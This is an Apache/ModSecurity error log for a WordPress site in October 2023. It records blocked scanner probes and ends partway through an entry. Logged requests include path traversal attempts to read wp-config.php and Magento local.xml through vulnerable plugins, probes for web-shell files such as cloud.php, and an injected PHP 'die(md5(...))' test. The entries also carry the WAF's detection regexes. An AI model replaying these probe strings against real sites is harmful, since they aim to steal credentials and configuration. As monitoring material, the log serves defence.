"(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi-importer/web/download_file.php"] [unique_id "ZTQTpQPReqmB971obKPFjQAAAEE"] [Sat Oct 21 13:08:37.921029 2023] [:error] [pid 684:tid 140513258276608] [client 104.248.229.153:43006] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi/web/download_file.php"] [unique_id "ZTQTpQPReqmB971obKPFjgAAAEI"] [Sat Oct 21 13:08:38.653457 2023] [:error] [pid 684:tid 140513224705792] [client 104.248.229.153:43008] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi-importer/conf/magmi.ini"] [unique_id "ZTQTpgPReqmB971obKPFjwAAAEY"] [Sat Oct 21 13:08:39.334663 2023] [:error] [pid 684:tid 140513118242560] [client 104.248.229.153:43010] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi/conf/magmi.ini"] [unique_id "ZTQTpwPReqmB971obKPFkAAAAEo"] [Sat Oct 21 16:52:21.050490 2023] [:error] [pid 683:tid 140513000744704] [client 20.234.172.126:46590] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Oct 21 16:52:24.103614 2023] [:error] [pid 684:tid 140513076279040] [client 20.234.172.126:46592] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Oct 22 00:12:04.133616 2023] [:error] [pid 684:tid 140513042708224] [client 95.111.235.86:53432] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php, referer: http://simplesite.com [Sun Oct 22 08:37:07.482666 2023] [:error] [pid 4513:tid 139878561937152] [client 20.229.137.71:60000] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Oct 22 08:37:10.263635 2023] [:error] [pid 4511:tid 139878620686080] [client 20.229.137.71:60002] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Oct 22 09:31:00.219687 2023] [autoindex:error] [pid 4512:tid 139878503188224] [client 136.0.111.176:60792] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php [Sun Oct 22 09:31:00.410393 2023] [autoindex:error] [pid 4513:tid 139878629078784] [client 136.0.111.176:60794] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php [Sun Oct 22 10:13:52.859428 2023] [autoindex:error] [pid 4513:tid 139878654256896] [client 95.111.235.86:32912] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php [Sun Oct 22 10:13:55.831722 2023] [autoindex:error] [pid 4512:tid 139878536759040] [client 95.111.235.86:32916] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php [Mon Oct 23 04:20:18.227488 2023] [:error] [pid 13992:tid 140517716379392] [client 13.233.198.211:47638] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Oct 23 04:20:18.437529 2023] [:error] [pid 13992:tid 140517614536448] [client 13.233.198.211:47640] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Oct 23 04:21:01.138651 2023] [autoindex:error] [pid 13419:tid 140517597751040] [client 13.233.198.211:47744] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Oct 23 04:21:11.633174 2023] [:error] [pid 13418:tid 140517480253184] [client 13.233.198.211:47790] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Oct 23 04:21:12.662511 2023] [autoindex:error] [pid 13992:tid 140517622929152] [client 13.233.198.211:47794] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Oct 23 04:21:13.790129 2023] [autoindex:error] [pid 13992:tid 140517614536448] [client 13.233.198.211:47798] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Oct 23 04:21:20.532972 2023] [:error] [pid 13417:tid 140517597751040] [client 13.233.198.211:47814] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Oct 23 04:21:20.834341 2023] [:error] [pid 13419:tid 140517589358336] [client 13.233.198.211:47816] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Oct 24 05:32:00.085414 2023] [autoindex:error] [pid 21535:tid 140531594467072] [client 68.178.228.95:44678] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Tue Oct 24 05:32:04.249841 2023] [autoindex:error] [pid 21535:tid 140531586074368] [client 68.178.228.95:44682] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Tue Oct 24 08:57:54.358490 2023] [:error] [pid 21535:tid 140531464140544] [client 20.163.50.250:48340] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Oct 24 08:57:56.087634 2023] [:error] [pid 20892:tid 140531346642688] [client 20.163.50.250:48342] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Oct 24 22:59:49.943931 2023] [:error] [pid 20892:tid 140531346642688] [client 41.216.188.162:34434] PHP Warning: PHP Startup: Unable to load dynamic library 'imagick.so' (tried: /usr/local/lib/php/extensions/no-debug-non-zts-20170718/imagick.so (/usr/local/lib/php/extensions/no-debug-non-zts-20170718/imagick.so: failed to map segment from shared object: Cannot allocate memory), /usr/local/lib/php/extensions/no-debug-non-zts-20170718/imagick.so.so (/usr/local/lib/php/extensions/no-debug-non-zts-20170718/imagick.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [Wed Oct 25 05:15:18.646259 2023] [:error] [pid 16432:tid 140531464140544] (12)Cannot allocate memory: [client 89.22.235.74:38474] couldn't create child process: /usr/local/sbin/suphp for /home/investig/public_html/index.php, referer: https://investigacionperu.com/ [Wed Oct 25 09:25:50.084518 2023] [:error] [pid 8646:tid 140041116423936] [client 45.151.167.11:54536] [client 45.151.167.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZTklbtXs4q13V22rzhZh0gAAAMg"] [Thu Oct 26 04:18:43.298520 2023] [:error] [pid 11824:tid 140020321068800] [client 176.109.180.96:47700] [client 176.109.180.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php"] [unique_id "ZTou8-SWnAs5rnBo6JHrbAAAAIk"] [Thu Oct 26 04:18:43.438790 2023] [:error] [pid 11821:tid 140020462130944] [client 176.109.180.96:47702] [client 176.109.180.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZTou8-H1tkCTfAUeV6148QAAAAE"] [Fri Oct 27 14:10:38.985342 2023] [:error] [pid 21964:tid 140580445153024] [client 192.42.116.184:55394] [client 192.42.116.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZTwLLlWNOdb5x3J0Fge65gAAANQ"] [Fri Oct 27 14:14:15.500895 2023] [:error] [pid 21447:tid 140580529080064] [client 20.102.109.145:55432] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Oct 27 14:14:15.558906 2023] [:error] [pid 21964:tid 140580579436288] [client 20.102.109.145:55434] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Oct 27 14:14:45.197240 2023] [autoindex:error] [pid 21449:tid 140580461938432] [client 20.102.109.145:55524] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 27 14:14:52.802951 2023] [:error] [pid 21449:tid 140580411582208] [client 20.102.109.145:55546] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Oct 27 14:14:53.504944 2023] [autoindex:error] [pid 21964:tid 140580470331136] [client 20.102.109.145:55550] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 27 14:14:54.176638 2023] [autoindex:error] [pid 21964:tid 140580487116544] [client 20.102.109.145:55554] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 27 14:14:58.125967 2023] [:error] [pid 21964:tid 140580436760320] [client 20.102.109.145:55568] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Oct 27 14:14:58.220758 2023] [:error] [pid 21449:tid 140580664370944] [client 20.102.109.145:55570] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Oct 27 15:14:28.191735 2023] [:error] [pid 21964:tid 140580554258176] [client 52.178.4.207:56588] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Oct 27 15:14:31.127841 2023] [:error] [pid 21964:tid 140580520687360] [client 52.178.4.207:56590] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Oct 28 08:41:51.195687 2023] [:error] [pid 24849:tid 140323745183488] [client 104.248.229.153:55394] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/amfeed/main/download"] [unique_id "ZT0Pn4VEnbIHp9EUwHyWkAAAAEA"] [Sat Oct 28 08:41:51.612285 2023] [:error] [pid 24850:tid 140323502098176] [client 104.248.229.153:55396] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi-importer/web/download_file.php"] [unique_id "ZT0Pn8CsTK2eYpLduiBkDwAAAJQ"] [Sat Oct 28 08:41:52.100530 2023] [:error] [pid 25411:tid 140323535668992] [client 104.248.229.153:55398] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi/web/download_file.php"] [unique_id "ZT0PoPqZnhrZ_YcBkLHmOgAAANA"] [Sat Oct 28 08:41:52.603295 2023] [:error] [pid 24850:tid 140323476920064] [client 104.248.229.153:55400] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi-importer/conf/magmi.ini"] [unique_id "ZT0PoMCsTK2eYpLduiBkEAAAAJc"] [Sat Oct 28 08:41:53.215823 2023] [:error] [pid 25411:tid 140323569239808] [client 104.248.229.153:55402] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi/conf/magmi.ini"] [unique_id "ZT0PofqZnhrZ_YcBkLHmOwAAAMw"] [Sat Oct 28 20:22:21.970096 2023] [autoindex:error] [pid 25411:tid 140323535668992] [client 143.198.139.187:38172] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Sun Oct 29 02:40:33.543394 2023] [autoindex:error] [pid 25411:tid 140323720005376] [client 51.68.11.223:43658] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Sun Oct 29 18:16:43.504544 2023] [:error] [pid 14585:tid 139869485520640] [client 185.220.102.248:58570] [client 185.220.102.248] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZT7n20KUN43jI3u3EPdCggAAAoU"] [Sun Oct 29 19:55:07.312887 2023] [autoindex:error] [pid 1711:tid 139869393200896] [client 50.62.176.51:59896] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php [Mon Oct 30 08:08:32.314031 2023] [:error] [pid 17153:tid 140524937729792] [client 147.135.129.229:47636] [client 147.135.129.229] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:cdshell. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:cdshell: die(md5(4565462));"] [severity 